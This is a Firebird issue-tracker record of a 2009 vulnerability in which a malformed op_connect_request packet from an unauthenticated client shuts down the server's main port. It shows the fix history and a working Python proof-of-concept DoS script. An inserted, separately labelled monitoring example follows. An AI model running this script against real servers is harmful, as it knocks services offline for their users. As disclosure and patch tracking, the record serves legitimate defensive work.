
Possible DoS attack using the malformed packet sent into the connection port [CORE2563] #2973

Closed
firebird-issue-importer opened this issue Jul 20, 2009 · 11 comments

Comments

@firebird-issue-importer

Submitted by: @dyemanov

It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

Commits: 0964cde 01fbf3c a095a41 d6c79a4

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

assignee: Dmitry Yemanov [ dimitr ]

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: Open [ 1 ] => In Progress [ 3 ]

firebird-issue-importer commented Jul 20, 2009

Commented by: @dyemanov

This is the restricted (developers only) comment which contains a Python script reproducing the issue.

import socket
import time

def attack(host, port):
    op_connect_request = '\x35'  # Request to establish connection (op_connect_request)

    packet  = '\x00\x00\x00' + op_connect_request
    packet += "A" * 12              # Invalid data, must be >= 12 bytes in order to trigger the DoS

    print "(+) Connecting to the server...."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "(+) Sending op_connect_request packet..."
    s.send(str(packet))
    s.close()
    print "(+) op_connect_request packet successfully sent."

    # Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
    print "(+) Waiting 10 seconds before trying to reconnect to the server..."
    time.sleep(10)

    try:
        print "(+) Trying to reconnect..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print "(!) Something went wrong. The server is still alive."
    except socket.error:
        print "(*) Attack successful. The server is down."

port = 3050
host = '127.0.0.1'  # Replace with your target host
attack(host, port)
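
The condition the report describes, the main listener (port 3050 by default) no longer accepting new connections, is what an operator needs to notice quickly while the fixed versions are rolled out. The following Python 3 example is added here and is not part of the original comment or of the Firebird project: it is a defender-side availability probe that classifies each TCP connect attempt (accepted, refused, timed out, other error) and escalates to an alert only after consecutive failures, so one transient miss does not page anyone. The `demo()` function uses a constructed local stand-in listener on an ephemeral port, not a Firebird server, so it runs offline; the host, port and threshold values are assumptions for the demonstration.

```python
import errno
import socket

# Added example, not code from the issue: a liveness monitor for a listener port.
# The DoS above leaves the listener closed, which this probe reports as "refused".


def probe_listener(host, port, timeout=3.0):
    """Attempt one TCP connect and classify the outcome.

    Returns "up", "refused", "timeout" or "error:<ERRNO_NAME>".
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "up"
    except socket.timeout:
        return "timeout"          # host reachable but no SYN/ACK (or filtered)
    except ConnectionRefusedError:
        return "refused"          # nothing is listening on the port any more
    except OSError as e:
        return "error:%s" % errno.errorcode.get(e.errno, str(e.errno))
    finally:
        s.close()


class ListenerMonitor:
    """Counts consecutive failed probes and escalates after a threshold."""

    def __init__(self, host, port, failures_to_alert=2, timeout=3.0):
        self.host = host
        self.port = port
        self.failures_to_alert = failures_to_alert
        self.timeout = timeout
        self.consecutive_failures = 0

    def check(self):
        """Run one probe; return (level, state), level in {"ok", "warn", "alert"}."""
        state = probe_listener(self.host, self.port, self.timeout)
        if state == "up":
            self.consecutive_failures = 0
            return ("ok", state)
        self.consecutive_failures += 1
        if self.consecutive_failures >= self.failures_to_alert:
            return ("alert", state)
        return ("warn", state)


def demo():
    """Constructed scenario: a local stand-in listener (not Firebird) is probed
    while up, then closed to simulate the main port being shut down."""
    stand_in = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    stand_in.bind(("127.0.0.1", 0))          # ephemeral port, assumption for the demo
    stand_in.listen(5)                        # kernel completes handshakes into the backlog
    port = stand_in.getsockname()[1]

    monitor = ListenerMonitor("127.0.0.1", port, failures_to_alert=2, timeout=1.0)
    while_up = monitor.check()                # ("ok", "up")
    stand_in.close()                          # port released: new connects are refused
    first_miss = monitor.check()              # ("warn", "refused")
    second_miss = monitor.check()             # ("alert", "refused")
    return while_up, first_miss, second_miss


if __name__ == "__main__":
    for level, state in demo():
        print("%-5s listener state: %s" % (level, state))
```

In production the same `ListenerMonitor` would be pointed at the real host and port 3050 and driven from a scheduler; distinguishing "refused" from "timeout" matters because the former is the signature of the listener itself going away, while the latter more often indicates a network or firewall problem.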

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

description: It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jun-2009 by Core Security Technologies. => It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: In Progress [ 3 ] => In Progress [ 3 ]

Fix Version: 2.1.3 [ 10302 ]

Fix Version: 2.5 Beta 2 [ 10300 ]

Fix Version: 1.5.6 [ 10225 ]

Fix Version: 2.0.6 [ 10303 ]

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: In Progress [ 3 ] => Open [ 1 ]

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

security: Developers [ 10012 ] =>

firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

firebird-issue-importer commented Nov 9, 2009

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

firebird-issue-importer commented Jan 18, 2016

Modified by: @pavel-zotov

QA Status: No test

firebird-issue-importer commented Aug 7, 2016

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Not enough information
